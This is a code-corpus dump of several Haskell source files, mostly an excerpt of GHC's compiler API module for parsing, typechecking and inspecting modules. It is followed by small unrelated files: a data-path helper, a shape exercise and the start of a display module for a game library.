-- | Get the 'DynFlags' used to evaluate interactive expressions.
getInteractiveDynFlags :: GhcMonad m => m DynFlags
getInteractiveDynFlags = withSession $ \h -> return (ic_dflags (hsc_IC h))
parseDynamicFlags :: MonadIO m =>
DynFlags -> [Located String]
-> m (DynFlags, [Located String], [Located String])
parseDynamicFlags = parseDynamicFlagsCmdLine
-- %************************************************************************
-- %* *
-- Setting, getting, and modifying the targets
-- %* *
-- %************************************************************************
-- ToDo: think about relative vs. absolute file paths. And what
-- happens when the current directory changes.
-- | Sets the targets for this session. Each target may be a module name
-- or a filename. The targets correspond to the set of root modules for
-- the program\/library. Unloading the current program is achieved by
-- setting the current set of targets to be empty, followed by 'load'.
setTargets :: GhcMonad m => [Target] -> m ()
setTargets targets = modifySession (\h -> h{ hsc_targets = targets })
-- | Returns the current set of targets
getTargets :: GhcMonad m => m [Target]
getTargets = withSession (return . hsc_targets)
-- | Add another target.
addTarget :: GhcMonad m => Target -> m ()
addTarget target
= modifySession (\h -> h{ hsc_targets = target : hsc_targets h })
-- | Remove a target
removeTarget :: GhcMonad m => TargetId -> m ()
removeTarget target_id
= modifySession (\h -> h{ hsc_targets = filter (hsc_targets h) })
where
filter targets = [ t | t@(Target id _ _) <- targets, id /= target_id ]
-- | Attempts to guess what Target a string refers to. This function
-- implements the @--make@/GHCi command-line syntax for filenames:
--
-- - if the string looks like a Haskell source filename, then interpret it
-- as such
--
-- - if adding a .hs or .lhs suffix yields the name of an existing file,
-- then use that
--
-- - otherwise interpret the string as a module name
--
guessTarget :: GhcMonad m => String -> Maybe Phase -> m Target
guessTarget str (Just phase)
= return (Target (TargetFile str (Just phase)) True Nothing)
guessTarget str Nothing
| isHaskellSrcFilename file
= return (target (TargetFile file Nothing))
| otherwise
= do exists <- liftIO $ doesFileExist hs_file
if exists
then return (target (TargetFile hs_file Nothing))
else do
exists <- liftIO $ doesFileExist lhs_file
if exists
then return (target (TargetFile lhs_file Nothing))
else do
if looksLikeModuleName file
then return (target (TargetModule (mkModuleName file)))
else do
dflags <- getDynFlags
liftIO $ throwGhcExceptionIO
(ProgramError (showSDoc dflags $
text "target" <+> quotes (text file) <+>
text "is not a module name or a source file"))
where
(file,obj_allowed)
| '*':rest <- str = (rest, False)
| otherwise = (str, True)
hs_file = file <.> "hs"
lhs_file = file <.> "lhs"
target tid = Target tid obj_allowed Nothing
-- | Inform GHC that the working directory has changed. GHC will flush
-- its cache of module locations, since it may no longer be valid.
--
-- Note: Before changing the working directory make sure all threads running
-- in the same session have stopped. If you change the working directory,
-- you should also unload the current program (set targets to empty,
-- followed by load).
workingDirectoryChanged :: GhcMonad m => m ()
workingDirectoryChanged = withSession $ (liftIO . flushFinderCaches)
-- %************************************************************************
-- %* *
-- Running phases one at a time
-- %* *
-- %************************************************************************
class ParsedMod m where
modSummary :: m -> ModSummary
parsedSource :: m -> ParsedSource
class ParsedMod m => TypecheckedMod m where
renamedSource :: m -> Maybe RenamedSource
typecheckedSource :: m -> TypecheckedSource
moduleInfo :: m -> ModuleInfo
tm_internals :: m -> (TcGblEnv, ModDetails)
-- ToDo: improvements that could be made here:
-- if the module succeeded renaming but not typechecking,
-- we can still get back the GlobalRdrEnv and exports, so
-- perhaps the ModuleInfo should be split up into separate
-- fields.
class TypecheckedMod m => DesugaredMod m where
coreModule :: m -> ModGuts
-- | The result of successful parsing.
data ParsedModule =
ParsedModule { pm_mod_summary :: ModSummary
, pm_parsed_source :: ParsedSource
, pm_extra_src_files :: [FilePath]
, pm_annotations :: ApiAnns }
-- See Note [Api annotations] in ApiAnnotation.hs
instance ParsedMod ParsedModule where
modSummary m = pm_mod_summary m
parsedSource m = pm_parsed_source m
-- | The result of successful typechecking. It also contains the parser
-- result.
data TypecheckedModule =
TypecheckedModule { tm_parsed_module :: ParsedModule
, tm_renamed_source :: Maybe RenamedSource
, tm_typechecked_source :: TypecheckedSource
, tm_checked_module_info :: ModuleInfo
, tm_internals_ :: (TcGblEnv, ModDetails)
}
instance ParsedMod TypecheckedModule where
modSummary m = modSummary (tm_parsed_module m)
parsedSource m = parsedSource (tm_parsed_module m)
instance TypecheckedMod TypecheckedModule where
renamedSource m = tm_renamed_source m
typecheckedSource m = tm_typechecked_source m
moduleInfo m = tm_checked_module_info m
tm_internals m = tm_internals_ m
-- | The result of successful desugaring (i.e., translation to core). Also
-- contains all the information of a typechecked module.
data DesugaredModule =
DesugaredModule { dm_typechecked_module :: TypecheckedModule
, dm_core_module :: ModGuts
}
instance ParsedMod DesugaredModule where
modSummary m = modSummary (dm_typechecked_module m)
parsedSource m = parsedSource (dm_typechecked_module m)
instance TypecheckedMod DesugaredModule where
renamedSource m = renamedSource (dm_typechecked_module m)
typecheckedSource m = typecheckedSource (dm_typechecked_module m)
moduleInfo m = moduleInfo (dm_typechecked_module m)
tm_internals m = tm_internals_ (dm_typechecked_module m)
instance DesugaredMod DesugaredModule where
coreModule m = dm_core_module m
type ParsedSource = Located (HsModule RdrName)
type RenamedSource = (HsGroup Name, [LImportDecl Name], Maybe [LIE Name],
Maybe LHsDocString)
type TypecheckedSource = LHsBinds Id
-- NOTE:
-- - things that aren't in the output of the typechecker right now:
-- - the export list
-- - the imports
-- - type signatures
-- - type/data/newtype declarations
-- - class declarations
-- - instances
-- - extra things in the typechecker's output:
-- - default methods are turned into top-level decls.
-- - dictionary bindings
-- | Return the 'ModSummary' of a module with the given name.
--
-- The module must be part of the module graph (see 'hsc_mod_graph' and
-- 'ModuleGraph'). If this is not the case, this function will throw a
-- 'GhcApiError'.
--
-- This function ignores boot modules and requires that there is only one
-- non-boot module with the given name.
getModSummary :: GhcMonad m => ModuleName -> m ModSummary
getModSummary mod = do
mg <- liftM hsc_mod_graph getSession
case [ ms | ms <- mg, ms_mod_name ms == mod, not (isBootSummary ms) ] of
[] -> do dflags <- getDynFlags
liftIO $ throwIO $ mkApiErr dflags (text "Module not part of module graph")
[ms] -> return ms
multiple -> do dflags <- getDynFlags
liftIO $ throwIO $ mkApiErr dflags (text "getModSummary is ambiguous: " <+> ppr multiple)
-- | Parse a module.
--
-- Throws a 'SourceError' on parse error.
parseModule :: GhcMonad m => ModSummary -> m ParsedModule
parseModule ms = do
hsc_env <- getSession
let hsc_env_tmp = hsc_env { hsc_dflags = ms_hspp_opts ms }
hpm <- liftIO $ hscParse hsc_env_tmp ms
return (ParsedModule ms (hpm_module hpm) (hpm_src_files hpm)
(hpm_annotations hpm))
-- See Note [Api annotations] in ApiAnnotation.hs
-- | Typecheck and rename a parsed module.
--
-- Throws a 'SourceError' if either fails.
typecheckModule :: GhcMonad m => ParsedModule -> m TypecheckedModule
typecheckModule pmod = do
let ms = modSummary pmod
hsc_env <- getSession
let hsc_env_tmp = hsc_env { hsc_dflags = ms_hspp_opts ms }
(tc_gbl_env, rn_info)
<- liftIO $ hscTypecheckRename hsc_env_tmp ms $
HsParsedModule { hpm_module = parsedSource pmod,
hpm_src_files = pm_extra_src_files pmod,
hpm_annotations = pm_annotations pmod }
details <- liftIO $ makeSimpleDetails hsc_env_tmp tc_gbl_env
safe <- liftIO $ finalSafeMode (ms_hspp_opts ms) tc_gbl_env
return $
TypecheckedModule {
tm_internals_ = (tc_gbl_env, details),
tm_parsed_module = pmod,
tm_renamed_source = rn_info,
tm_typechecked_source = tcg_binds tc_gbl_env,
tm_checked_module_info =
ModuleInfo {
minf_type_env = md_types details,
minf_exports = availsToNameSet $ md_exports details,
minf_rdr_env = Just (tcg_rdr_env tc_gbl_env),
minf_instances = md_insts details,
minf_iface = Nothing,
minf_safe = safe
#ifdef GHCI
,minf_modBreaks = emptyModBreaks
#endif
}}
-- | Desugar a typechecked module.
desugarModule :: GhcMonad m => TypecheckedModule -> m DesugaredModule
desugarModule tcm = do
let ms = modSummary tcm
let (tcg, _) = tm_internals tcm
hsc_env <- getSession
let hsc_env_tmp = hsc_env { hsc_dflags = ms_hspp_opts ms }
guts <- liftIO $ hscDesugar hsc_env_tmp ms tcg
return $
DesugaredModule {
dm_typechecked_module = tcm,
dm_core_module = guts
}
-- | Load a module. Input doesn't need to be desugared.
--
-- A module must be loaded before dependent modules can be typechecked. This
-- always includes generating a 'ModIface' and, depending on the
-- 'DynFlags.hscTarget', may also include code generation.
--
-- This function will always cause recompilation and will always overwrite
-- previous compilation results (potentially files on disk).
--
loadModule :: (TypecheckedMod mod, GhcMonad m) => mod -> m mod
loadModule tcm = do
let ms = modSummary tcm
let mod = ms_mod_name ms
let loc = ms_location ms
let (tcg, _details) = tm_internals tcm
mb_linkable <- case ms_obj_date ms of
Just t | t > ms_hs_date ms -> do
l <- liftIO $ findObjectLinkable (ms_mod ms)
(ml_obj_file loc) t
return (Just l)
_otherwise -> return Nothing
let source_modified | isNothing mb_linkable = SourceModified
| otherwise = SourceUnmodified
-- we can't determine stability here
-- compile doesn't change the session
hsc_env <- getSession
mod_info <- liftIO $ compileOne' (Just tcg) Nothing
hsc_env ms 1 1 Nothing mb_linkable
source_modified
modifySession $ \e -> e{ hsc_HPT = addToUFM (hsc_HPT e) mod mod_info }
return tcm
-- %************************************************************************
-- %* *
-- Dealing with Core
-- %* *
-- %************************************************************************
-- | A CoreModule consists of just the fields of a 'ModGuts' that are needed for
-- the 'GHC.compileToCoreModule' interface.
data CoreModule
= CoreModule {
-- | Module name
cm_module :: !Module,
-- | Type environment for types declared in this module
cm_types :: !TypeEnv,
-- | Declarations
cm_binds :: CoreProgram,
-- | Safe Haskell mode
cm_safe :: SafeHaskellMode
}
instance Outputable CoreModule where
ppr (CoreModule {cm_module = mn, cm_types = te, cm_binds = cb,
cm_safe = sf})
= text "%module" <+> ppr mn <+> parens (ppr sf) <+> ppr te
$$ vcat (map ppr cb)
-- | This is the way to get access to the Core bindings corresponding
-- to a module. 'compileToCore' parses, typechecks, and
-- desugars the module, then returns the resulting Core module (consisting of
-- the module name, type declarations, and function declarations) if
-- successful.
compileToCoreModule :: GhcMonad m => FilePath -> m CoreModule
compileToCoreModule = compileCore False
-- | Like compileToCoreModule, but invokes the simplifier, so
-- as to return simplified and tidied Core.
compileToCoreSimplified :: GhcMonad m => FilePath -> m CoreModule
compileToCoreSimplified = compileCore True
compileCore :: GhcMonad m => Bool -> FilePath -> m CoreModule
compileCore simplify fn = do
-- First, set the target to the desired filename
target <- guessTarget fn Nothing
addTarget target
_ <- load LoadAllTargets
-- Then find dependencies
modGraph <- depanal [] True
case find ((== fn) . msHsFilePath) modGraph of
Just modSummary -> do
-- Now we have the module name;
-- parse, typecheck and desugar the module
mod_guts <- coreModule `fmap`
-- TODO: space leaky: call hsc* directly?
(desugarModule =<< typecheckModule =<< parseModule modSummary)
liftM (gutsToCoreModule (mg_safe_haskell mod_guts)) $
if simplify
then do
-- If simplify is true: simplify (hscSimplify), then tidy
-- (tidyProgram).
hsc_env <- getSession
simpl_guts <- liftIO $ hscSimplify hsc_env mod_guts
tidy_guts <- liftIO $ tidyProgram hsc_env simpl_guts
return $ Left tidy_guts
else
return $ Right mod_guts
Nothing -> panic "compileToCoreModule: target FilePath not found in\
module dependency graph"
where -- two versions, based on whether we simplify (thus run tidyProgram,
-- which returns a (CgGuts, ModDetails) pair, or not (in which case
-- we just have a ModGuts.
gutsToCoreModule :: SafeHaskellMode
-> Either (CgGuts, ModDetails) ModGuts
-> CoreModule
gutsToCoreModule safe_mode (Left (cg, md)) = CoreModule {
cm_module = cg_module cg,
cm_types = md_types md,
cm_binds = cg_binds cg,
cm_safe = safe_mode
}
gutsToCoreModule safe_mode (Right mg) = CoreModule {
cm_module = mg_module mg,
cm_types = typeEnvFromEntities (bindersOfBinds (mg_binds mg))
(mg_tcs mg)
(mg_fam_insts mg),
cm_binds = mg_binds mg,
cm_safe = safe_mode
}
-- %************************************************************************
-- %* *
-- Inspecting the session
-- %* *
-- %************************************************************************
-- | Get the module dependency graph.
getModuleGraph :: GhcMonad m => m ModuleGraph -- ToDo: DiGraph ModSummary
getModuleGraph = liftM hsc_mod_graph getSession
-- | Determines whether a set of modules requires Template Haskell.
--
-- Note that if the session's 'DynFlags' enabled Template Haskell when
-- 'depanal' was called, then each module in the returned module graph will
-- have Template Haskell enabled whether it is actually needed or not.
needsTemplateHaskell :: ModuleGraph -> Bool
needsTemplateHaskell ms =
any (xopt Opt_TemplateHaskell . ms_hspp_opts) ms
-- | Return @True@ <==> module is loaded.
isLoaded :: GhcMonad m => ModuleName -> m Bool
isLoaded m = withSession $ \hsc_env ->
return $! isJust (lookupUFM (hsc_HPT hsc_env) m)
-- | Return the bindings for the current interactive session.
getBindings :: GhcMonad m => m [TyThing]
getBindings = withSession $ \hsc_env ->
return $ icInScopeTTs $ hsc_IC hsc_env
-- | Return the instances for the current interactive session.
getInsts :: GhcMonad m => m ([ClsInst], [FamInst])
getInsts = withSession $ \hsc_env ->
return $ ic_instances (hsc_IC hsc_env)
getPrintUnqual :: GhcMonad m => m PrintUnqualified
getPrintUnqual = withSession $ \hsc_env ->
return (icPrintUnqual (hsc_dflags hsc_env) (hsc_IC hsc_env))
-- | Container for information about a 'Module'.
data ModuleInfo = ModuleInfo {
minf_type_env :: TypeEnv,
minf_exports :: NameSet, -- ToDo, [AvailInfo] like ModDetails?
minf_rdr_env :: Maybe GlobalRdrEnv, -- Nothing for a compiled/package mod
minf_instances :: [ClsInst],
minf_iface :: Maybe ModIface,
minf_safe :: SafeHaskellMode
#ifdef GHCI
,minf_modBreaks :: ModBreaks
#endif
}
-- We don't want HomeModInfo here, because a ModuleInfo applies
-- to package modules too.
-- | Request information about a loaded 'Module'
getModuleInfo :: GhcMonad m => Module -> m (Maybe ModuleInfo) -- XXX: Maybe X
getModuleInfo mdl = withSession $ \hsc_env -> do
let mg = hsc_mod_graph hsc_env
if mdl `elem` map ms_mod mg
then liftIO $ getHomeModuleInfo hsc_env mdl
else do
{- if isHomeModule (hsc_dflags hsc_env) mdl
then return Nothing
else -} liftIO $ getPackageModuleInfo hsc_env mdl
-- ToDo: we don't understand what the following comment means.
-- (SDM, 19/7/2011)
-- getPackageModuleInfo will attempt to find the interface, so
-- we don't want to call it for a home module, just in case there
-- was a problem loading the module and the interface doesn't
-- exist... hence the isHomeModule test here. (ToDo: reinstate)
getPackageModuleInfo :: HscEnv -> Module -> IO (Maybe ModuleInfo)
#ifdef GHCI
getPackageModuleInfo hsc_env mdl
= do eps <- hscEPS hsc_env
iface <- hscGetModuleInterface hsc_env mdl
let
avails = mi_exports iface
names = availsToNameSet avails
pte = eps_PTE eps
tys = [ ty | name <- concatMap availNames avails,
Just ty <- [lookupTypeEnv pte name] ]
--
return (Just (ModuleInfo {
minf_type_env = mkTypeEnv tys,
minf_exports = names,
minf_rdr_env = Just $! availsToGlobalRdrEnv (moduleName mdl) avails,
minf_instances = error "getModuleInfo: instances for package module unimplemented",
minf_iface = Just iface,
minf_safe = getSafeMode $ mi_trust iface,
minf_modBreaks = emptyModBreaks
}))
#else
-- bogusly different for non-GHCI (ToDo)
getPackageModuleInfo _hsc_env _mdl = do
return Nothing
#endif
getHomeModuleInfo :: HscEnv -> Module -> IO (Maybe ModuleInfo)
getHomeModuleInfo hsc_env mdl =
case lookupUFM (hsc_HPT hsc_env) (moduleName mdl) of
Nothing -> return Nothing
Just hmi -> do
let details = hm_details hmi
iface = hm_iface hmi
return (Just (ModuleInfo {
minf_type_env = md_types details,
minf_exports = availsToNameSet (md_exports details),
minf_rdr_env = mi_globals $! hm_iface hmi,
minf_instances = md_insts details,
minf_iface = Just iface,
minf_safe = getSafeMode $ mi_trust iface
#ifdef GHCI
,minf_modBreaks = getModBreaks hmi
#endif
}))
-- | The list of top-level entities defined in a module
modInfoTyThings :: ModuleInfo -> [TyThing]
modInfoTyThings minf = typeEnvElts (minf_type_env minf)
modInfoTopLevelScope :: ModuleInfo -> Maybe [Name]
modInfoTopLevelScope minf
= fmap (map gre_name . globalRdrEnvElts) (minf_rdr_env minf)
modInfoExports :: ModuleInfo -> [Name]
modInfoExports minf = nameSetElems $! minf_exports minf
-- | Returns the instances defined by the specified module.
-- Warning: currently unimplemented for package modules.
modInfoInstances :: ModuleInfo -> [ClsInst]
modInfoInstances = minf_instances
modInfoIsExportedName :: ModuleInfo -> Name -> Bool
modInfoIsExportedName minf name = elemNameSet name (minf_exports minf)
mkPrintUnqualifiedForModule :: GhcMonad m =>
ModuleInfo
-> m (Maybe PrintUnqualified) -- XXX: returns a Maybe X
mkPrintUnqualifiedForModule minf = withSession $ \hsc_env -> do
return (fmap (mkPrintUnqualified (hsc_dflags hsc_env)) (minf_rdr_env minf))
modInfoLookupName :: GhcMonad m =>
ModuleInfo -> Name
-> m (Maybe TyThing) -- XXX: returns a Maybe X
modInfoLookupName minf name = withSession $ \hsc_env -> do
case lookupTypeEnv (minf_type_env minf) name of
Just tyThing -> return (Just tyThing)
Nothing -> do
eps <- liftIO $ readIORef (hsc_EPS hsc_env)
return $! lookupType (hsc_dflags hsc_env)
(hsc_HPT hsc_env) (eps_PTE eps) name
modInfoIface :: ModuleInfo -> Maybe ModIface
modInfoIface = minf_iface
-- | Retrieve module safe haskell mode
modInfoSafe :: ModuleInfo -> SafeHaskellMode
modInfoSafe = minf_safe
#ifdef GHCI
modInfoModBreaks :: ModuleInfo -> ModBreaks
modInfoModBreaks = minf_modBreaks
#endif
isDictonaryId :: Id -> Bool
isDictonaryId id
= case tcSplitSigmaTy (idType id) of { (_tvs, _theta, tau) -> isDictTy tau }
-- | Looks up a global name: that is, any top-level name in any
-- visible module. Unlike 'lookupName', lookupGlobalName does not use
-- the interactive context, and therefore does not require a preceding
-- 'setContext'.
lookupGlobalName :: GhcMonad m => Name -> m (Maybe TyThing)
lookupGlobalName name = withSession $ \hsc_env -> do
liftIO $ lookupTypeHscEnv hsc_env name
findGlobalAnns :: (GhcMonad m, Typeable a) => ([Word8] -> a) -> AnnTarget Name -> m [a]
findGlobalAnns deserialize target = withSession $ \hsc_env -> do
ann_env <- liftIO $ prepareAnnotations hsc_env Nothing
return (findAnns deserialize ann_env target)
#ifdef GHCI
-- | get the GlobalRdrEnv for a session
getGRE :: GhcMonad m => m GlobalRdrEnv
getGRE = withSession $ \hsc_env-> return $ ic_rn_gbl_env (hsc_IC hsc_env)
#endif
-- -----------------------------------------------------------------------------
{- ToDo: Move the primary logic here to compiler/main/Packages.hs
-- | Return all /external/ modules available in the package database.
-- Modules from the current session (i.e., from the 'HomePackageTable') are
-- not included. This includes module names which are reexported by packages.
packageDbModules :: GhcMonad m =>
Bool -- ^ Only consider exposed packages.
-> m [Module]
packageDbModules only_exposed = do
dflags <- getSessionDynFlags
let pkgs = eltsUFM (pkgIdMap (pkgState dflags))
return $
[ mkModule pid modname
| p <- pkgs
, not only_exposed || exposed p
, let pid = packageConfigId p
, modname <- exposedModules p
++ map exportName (reexportedModules p) ]
-}
-- -----------------------------------------------------------------------------
-- Misc exported utils
dataConType :: DataCon -> Type
dataConType dc = idType (dataConWrapId dc)
-- | print a 'NamedThing', adding parentheses if the name is an operator.
pprParenSymName :: NamedThing a => a -> SDoc
pprParenSymName a = parenSymOcc (getOccName a) (ppr (getName a))
-- ----------------------------------------------------------------------------
#if 0
-- ToDo:
-- - Data and Typeable instances for HsSyn.
-- ToDo: check for small transformations that happen to the syntax in
-- the typechecker (eg. -e ==> negate e, perhaps for fromIntegral)
-- ToDo: maybe use TH syntax instead of IfaceSyn? There's already a way
-- to get from TyCons, Ids etc. to TH syntax (reify).
-- :browse will use either lm_toplev or inspect lm_interface, depending
-- on whether the module is interpreted or not.
#endif
-- Extract the filename, stringbuffer content and dynflags associed to a module
--
-- XXX: Explain pre-conditions
getModuleSourceAndFlags :: GhcMonad m => Module -> m (String, StringBuffer, DynFlags)
getModuleSourceAndFlags mod = do
m <- getModSummary (moduleName mod)
case ml_hs_file $ ms_location m of
Nothing -> do dflags <- getDynFlags
liftIO $ throwIO $ mkApiErr dflags (text "No source available for module " <+> ppr mod)
Just sourceFile -> do
source <- liftIO $ hGetStringBuffer sourceFile
return (sourceFile, source, ms_hspp_opts m)
-- | Return module source as token stream, including comments.
--
-- The module must be in the module graph and its source must be available.
-- Throws a 'HscTypes.SourceError' on parse error.
getTokenStream :: GhcMonad m => Module -> m [Located Token]
getTokenStream mod = do
(sourceFile, source, flags) <- getModuleSourceAndFlags mod
let startLoc = mkRealSrcLoc (mkFastString sourceFile) 1 1
case lexTokenStream source startLoc flags of
POk _ ts -> return ts
PFailed span err ->
do dflags <- getDynFlags
liftIO $ throwIO $ mkSrcErr (unitBag $ mkPlainErrMsg dflags span err)
-- | Give even more information on the source than 'getTokenStream'
-- This function allows reconstructing the source completely with
-- 'showRichTokenStream'.
getRichTokenStream :: GhcMonad m => Module -> m [(Located Token, String)]
getRichTokenStream mod = do
(sourceFile, source, flags) <- getModuleSourceAndFlags mod
let startLoc = mkRealSrcLoc (mkFastString sourceFile) 1 1
case lexTokenStream source startLoc flags of
POk _ ts -> return $ addSourceToTokens startLoc source ts
PFailed span err ->
do dflags <- getDynFlags
liftIO $ throwIO $ mkSrcErr (unitBag $ mkPlainErrMsg dflags span err)
-- | Given a source location and a StringBuffer corresponding to this
-- location, return a rich token stream with the source associated to the
-- tokens.
addSourceToTokens :: RealSrcLoc -> StringBuffer -> [Located Token]
-> [(Located Token, String)]
addSourceToTokens _ _ [] = []
addSourceToTokens loc buf (t@(L span _) : ts)
= case span of
UnhelpfulSpan _ -> (t,"") : addSourceToTokens loc buf ts
RealSrcSpan s -> (t,str) : addSourceToTokens newLoc newBuf ts
where
(newLoc, newBuf, str) = go "" loc buf
start = realSrcSpanStart s
end = realSrcSpanEnd s
go acc loc buf | loc < start = go acc nLoc nBuf
| start <= loc && loc < end = go (ch:acc) nLoc nBuf
| otherwise = (loc, buf, reverse acc)
where (ch, nBuf) = nextChar buf
nLoc = advanceSrcLoc loc ch
-- | Take a rich token stream such as produced from 'getRichTokenStream' and
-- return source code almost identical to the original code (except for
-- insignificant whitespace.)
showRichTokenStream :: [(Located Token, String)] -> String
showRichTokenStream ts = go startLoc ts ""
where sourceFile = getFile $ map (getLoc . fst) ts
getFile [] = panic "showRichTokenStream: No source file found"
getFile (UnhelpfulSpan _ : xs) = getFile xs
getFile (RealSrcSpan s : _) = srcSpanFile s
startLoc = mkRealSrcLoc sourceFile 1 1
go _ [] = id
go loc ((L span _, str):ts)
= case span of
UnhelpfulSpan _ -> go loc ts
RealSrcSpan s
| locLine == tokLine -> ((replicate (tokCol - locCol) ' ') ++)
. (str ++)
. go tokEnd ts
| otherwise -> ((replicate (tokLine - locLine) '\n') ++)
. ((replicate (tokCol - 1) ' ') ++)
. (str ++)
. go tokEnd ts
where (locLine, locCol) = (srcLocLine loc, srcLocCol loc)
(tokLine, tokCol) = (srcSpanStartLine s, srcSpanStartCol s)
tokEnd = realSrcSpanEnd s
-- -----------------------------------------------------------------------------
-- Interactive evaluation
-- | Takes a 'ModuleName' and possibly a 'PackageKey', and consults the
-- filesystem and package database to find the corresponding 'Module',
-- using the algorithm that is used for an @import@ declaration.
findModule :: GhcMonad m => ModuleName -> Maybe FastString -> m Module
findModule mod_name maybe_pkg = withSession $ \hsc_env -> do
let
dflags = hsc_dflags hsc_env
this_pkg = thisPackage dflags
--
case maybe_pkg of
Just pkg | fsToPackageKey pkg /= this_pkg && pkg /= fsLit "this" -> liftIO $ do
res <- findImportedModule hsc_env mod_name maybe_pkg
case res of
Found _ m -> return m
err -> throwOneError $ noModError dflags noSrcSpan mod_name err
_otherwise -> do
home <- lookupLoadedHomeModule mod_name
case home of
Just m -> return m
Nothing -> liftIO $ do
res <- findImportedModule hsc_env mod_name maybe_pkg
case res of
Found loc m | modulePackageKey m /= this_pkg -> return m
| otherwise -> modNotLoadedError dflags m loc
err -> throwOneError $ noModError dflags noSrcSpan mod_name err
modNotLoadedError :: DynFlags -> Module -> ModLocation -> IO a
modNotLoadedError dflags m loc = throwGhcExceptionIO $ CmdLineError $ showSDoc dflags $
text "module is not loaded:" <+>
quotes (ppr (moduleName m)) <+>
parens (text (expectJust "modNotLoadedError" (ml_hs_file loc)))
-- | Like 'findModule', but differs slightly when the module refers to
-- a source file, and the file has not been loaded via 'load'. In
-- this case, 'findModule' will throw an error (module not loaded),
-- but 'lookupModule' will check to see whether the module can also be
-- found in a package, and if so, that package 'Module' will be
-- returned. If not, the usual module-not-found error will be thrown.
--
lookupModule :: GhcMonad m => ModuleName -> Maybe FastString -> m Module
lookupModule mod_name (Just pkg) = findModule mod_name (Just pkg)
lookupModule mod_name Nothing = withSession $ \hsc_env -> do
home <- lookupLoadedHomeModule mod_name
case home of
Just m -> return m
Nothing -> liftIO $ do
res <- findExposedPackageModule hsc_env mod_name Nothing
case res of
Found _ m -> return m
err -> throwOneError $ noModError (hsc_dflags hsc_env) noSrcSpan mod_name err
lookupLoadedHomeModule :: GhcMonad m => ModuleName -> m (Maybe Module)
lookupLoadedHomeModule mod_name = withSession $ \hsc_env ->
case lookupUFM (hsc_HPT hsc_env) mod_name of
Just mod_info -> return (Just (mi_module (hm_iface mod_info)))
_not_a_home_module -> return Nothing
#ifdef GHCI
-- | Check that a module is safe to import (according to Safe Haskell).
--
-- We return True to indicate the import is safe and False otherwise
-- although in the False case an error may be thrown first.
isModuleTrusted :: GhcMonad m => Module -> m Bool
isModuleTrusted m = withSession $ \hsc_env ->
liftIO $ hscCheckSafe hsc_env m noSrcSpan
-- | Return if a module is trusted and the pkgs it depends on to be trusted.
moduleTrustReqs :: GhcMonad m => Module -> m (Bool, [PackageKey])
moduleTrustReqs m = withSession $ \hsc_env ->
liftIO $ hscGetSafe hsc_env m noSrcSpan
-- | EXPERIMENTAL: DO NOT USE.
--
-- Set the monad GHCi lifts user statements into.
--
-- Checks that a type (in string form) is an instance of the
-- @GHC.GHCi.GHCiSandboxIO@ type class. Sets it to be the GHCi monad if it is,
-- throws an error otherwise.
{-# WARNING setGHCiMonad "This is experimental! Don't use." #-}
setGHCiMonad :: GhcMonad m => String -> m ()
setGHCiMonad name = withSession $ \hsc_env -> do
ty <- liftIO $ hscIsGHCiMonad hsc_env name
modifySession $ \s ->
let ic = (hsc_IC s) { ic_monad = ty }
in s { hsc_IC = ic }
getHistorySpan :: GhcMonad m => History -> m SrcSpan
getHistorySpan h = withSession $ \hsc_env ->
return $ InteractiveEval.getHistorySpan hsc_env h
obtainTermFromVal :: GhcMonad m => Int -> Bool -> Type -> a -> m Term
obtainTermFromVal bound force ty a = withSession $ \hsc_env ->
liftIO $ InteractiveEval.obtainTermFromVal hsc_env bound force ty a
obtainTermFromId :: GhcMonad m => Int -> Bool -> Id -> m Term
obtainTermFromId bound force id = withSession $ \hsc_env ->
liftIO $ InteractiveEval.obtainTermFromId hsc_env bound force id
#endif
-- | Returns the 'TyThing' for a 'Name'. The 'Name' may refer to any
-- entity known to GHC, including 'Name's defined using 'runStmt'.
lookupName :: GhcMonad m => Name -> m (Maybe TyThing)
lookupName name =
withSession $ \hsc_env ->
liftIO $ hscTcRcLookupName hsc_env name
-- -----------------------------------------------------------------------------
-- Pure API
-- | A pure interface to the module parser.
--
parser :: String -- ^ Haskell module source text (full Unicode is supported)
-> DynFlags -- ^ the flags
-> FilePath -- ^ the filename (for source locations)
-> Either ErrorMessages (WarningMessages, Located (HsModule RdrName))
parser str dflags filename =
let
loc = mkRealSrcLoc (mkFastString filename) 1 1
buf = stringToStringBuffer str
in
case unP Parser.parseModule (mkPState dflags buf loc) of
PFailed span err ->
Left (unitBag (mkPlainErrMsg dflags span err))
POk pst rdr_module ->
let (warns,_) = getMessages pst in
Right (warns, rdr_module)
| gcampax/ghc | compiler/main/GHC.hs | bsd-3-clause | 55,602 | 4 | 28 | 15,242 | 9,846 | 5,315 | 4,531 | -1 | -1 |
module Intrust
(path
)
where
import Text.Printf
import Development.Shake
import Development.Shake.FilePath
path :: String -> String -> FilePath
path var caseid = let base = "/data/pnl/INTRuST/" in
case var of
"dwied" -> printf (base </> "%s/diff/%s-dwi-Ed.nhdr") caseid caseid
"dwimask" -> printf (base </> "%s/diff/%s-tensor-mask.nhdr") caseid caseid
"dwiharm" -> printf (base </> "Harmonization-20160728/%s_hmz_iter1.nhdr") caseid
"fsindwi" -> printf (base </> "%s/diff/%s.fsindwi.nrrd") caseid caseid
"ukf_dwiharm_cpp" -> printf (base </> "harmonized-newquery/%s/diff/%s.ukf_2T.vtk.gz") caseid caseid
_ -> error "Add this var to Intrust.hs"
{-where base = "/Users/ryan/partners/data/pnl/INTRuST/"-}
| pnlbwh/test-tensormasking | config/Intrust.hs | bsd-3-clause | 744 | 0 | 12 | 123 | 171 | 89 | 82 | 14 | 6 |
module Module4.Task9 where
data Shape = Circle Double | Rectangle Double Double
isSquare :: Shape -> Bool
isSquare (Rectangle h w) = h == w
isSquare _ = False
| dstarcev/stepic-haskell | src/Module4/Task9.hs | bsd-3-clause | 168 | 0 | 7 | 38 | 59 | 32 | 27 | 5 | 1 |
-- |Includes core Tea monad functions that regulate display and framerate
-- as well as the runTea function that initializes hardware.
module Tea.Display
( screen
, update
, runTea
, setFrameRate
) where
import qualified Graphics.UI.SDL as SDL
import qualified Graphics.UI.SDL.Mixer as Mixer
import Control.Monad.State
import Control.Monad.Trans
import Control.Applicative((<$>))
import Data.Map (empty)
import Data.Array (listArray)
import Tea.Input (KeyCode)
import Tea.TeaState
import Tea.Screen
import Tea.Tea
-- |Retrieve a buffer handle on the Screen
screen :: Tea s Screen
screen = _screen <$> getT
-- |Sets the frame rate cap. Note that this is merely a cap, and the frame rate may
-- be slower than this if additional processing is required.
setFrameRate :: Int -> Tea s ()
setFrameRate n = modifyT $ \ts -> ts { _fpsCap = 1000 `div` n }
-- |Flip buffers, causing the hardware display to be updated with changes to
